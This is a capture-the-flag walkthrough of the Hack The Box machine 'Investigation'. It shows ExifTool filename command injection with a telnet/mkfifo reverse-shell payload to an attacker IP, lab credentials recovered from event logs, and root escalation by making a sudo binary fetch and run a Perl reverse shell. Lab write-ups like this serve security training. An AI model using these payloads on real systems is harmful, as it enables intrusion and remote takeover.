Investigation
Write up for the HTB machine 'Investigation'
1. Initial Recon
1.1. nmap
cmd nmap -sC -sV 10.10.11.197
From the nmap scan we get the url
http://eforenzics.htb/
which we can add to /etc/hostsWe have port 22 ssh and port 80 http
1.2. nikto
cmd nikto -host 10.10.11.197
found nothing interesting
2. website recon
/service.html has a file upload service
uploading any image file reveals the ExifTool Version Number 12.37
2.1. ExifTool
A quick google search for ExifTool reveals a command injection vulnerability for that version number
https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429
Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.
Our payload will be in the name of the file that we upload to the web application
After trying some payloads from revshells we can eventually use:
payload:
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.x.x 4444 0<$TF | sh 1>$TF |
3. user.txt
Once we have our reverse shell let's obtain a fully interactive shell with: python3 -c 'import pty;pty.spawn("/bin/bash");'
3.1. file system recon
After some recon of the file system we find the directory /usr/local/investigation
from here we can also find our username:
smorton
Let's download the files
On the victim machine spin up a http server using
python3 -m http.server
On your attacking machine run
curl http://10.10.11.197:8000/Windows%20Even%20Logs%20for%20Analysis.msg > out.msg
3.2. .msg file
Now we need to find what to do with a .msg
file. Thankfully we can use https://www.encryptomatic.com/viewer/
to analyse it for us, which will lead us to downloading a zip file, extract the file from the zip.
Now we've got a .evtx
file and we've gotta figure out what to do with that.
here's a python module that can help with that
https://pypi.org/project/python-evtx/
run
python3 evtx_dump.py security.evtx > out.json
In the event logs we can look for basic logon events Audit logon events (Windows)
The code
4625
is for aLogon failure. A logon attempt was made with an unknown user name or a known user name with a bad password.
We can search for this in the event log using grep
cat out.json | grep "4625" -C 10 > grep.out
From the output of our grep command we can find a password: Def@ultf0r3nz!csPa$$
Now we can ssh into the machine with the credentials
smorton:Def@ultf0r3nz!csPa$$
navigate to /home/smorton
for user.txt
4. root.txt
when we run sudo -l
we can see that there's a binary the user is allowed to run
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
So let's investigate this binary. Same as above let's spin up a http server using python3 on the victim machine and download the binary
run
python3 -m http.server
on the victim machinerun
curl http://10.10.11.197:8000/binary > binary.out
on your attacking machine
4.1. investigating the binary
let's start by running strings binary.out
...
Exiting...
lDnxUysaQn
Running...
perl ./%s
rm -f ./lDnxUysaQn
...
from this we can gather that
perl is being run on a string
lDnxUysaQn
has some significance
4.1.1. binary ninja
binary ninja allows us to decompile the binary and get an idea of what the main function of the binary is doing
0000144a if (argc != 3)
00001453 puts(str: "Exiting... ")
0000145d exit(status: 0)
0000145d noreturn
00001469 if (getuid() != 0)
00001472 puts(str: "Exiting... ")
0000147c exit(status: 0)
0000147c noreturn
0000149d if (strcmp(argv[2], "lDnxUysaQn") != 0)
00001687 puts(str: "Exiting... ")
00001691 exit(status: 0)
00001691 noreturn
000014aa puts(str: "Running... ")
000014c4 FILE* rax_8 = fopen(filename: argv[2], mode: &data_2027)
000014cd int64_t rax_9 = curl_easy_init()
000014d6 int32_t var_40 = 0x2712
000014f9 curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712)
000014fe int32_t var_3c = 0x2711
0000151a curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711)
0000151f int32_t var_38 = 0x2d
0000153c curl_easy_setopt(rax_9, 0x2d, 1, 0x2d)
00001554 if (curl_easy_perform(rax_9) != 0)
00001671 puts(str: "Exiting... ")
0000167b exit(status: 0)
0000167b noreturn
00001583 int64_t rax_25 = sx.q(snprintf(s: nullptr, maxlen: 0, format: &data_202a, argv[2]))
00001594 char* rax_28 = malloc(bytes: rax_25 + 1)
000015c6 snprintf(s: rax_28, maxlen: rax_25 + 1, format: &data_202a, argv[2])
000015ed int64_t rax_37 = sx.q(snprintf(s: nullptr, maxlen: 0, format: "perl ./%s", rax_28))
000015fe char* rax_40 = malloc(bytes: rax_37 + 1)
00001629 snprintf(s: rax_40, maxlen: rax_37 + 1, format: "perl ./%s", rax_28)
00001635 fclose(fp: rax_8)
00001641 curl_easy_cleanup(rax_9)
0000164b setuid(uid: 0)
00001657 system(line: rax_40)
00001663 system(line: "rm -f ./lDnxUysaQn")
from this we can gather
the program requires 2 arguments (line 1)
the second argument must be
lDnxUysaQn
(line 9)curl is being used on argument 1 (line 17, line 22)
perl is being run with system (line 31, line 35)
so let's construct a command to run on the victim machine so that it meets the above requirements
4.1.2. final payload
sudo /usr/bin/binary 10.10.x.x:80/payload.pl lDnxUysaQn
we need to be running the binary as sudo, so we need
sudo /usr/bin/binary
at the startthe first argument is being curled, so let's use
python3 -m http.server 80
to host our payload10.10.x.x:80/payload.pl
is so the binary curls from our machine
perl is being run, so let's make our payload a perl script for a reverse shell
from revshells get a perl reverse shell
finally,
lDnxUysaQn
is required at the end
Spin up the http server on your attacking machine along with a netcat listener
finally, our netcat listener will catch a reverse shell as the root user.
Last updated
Was this helpful?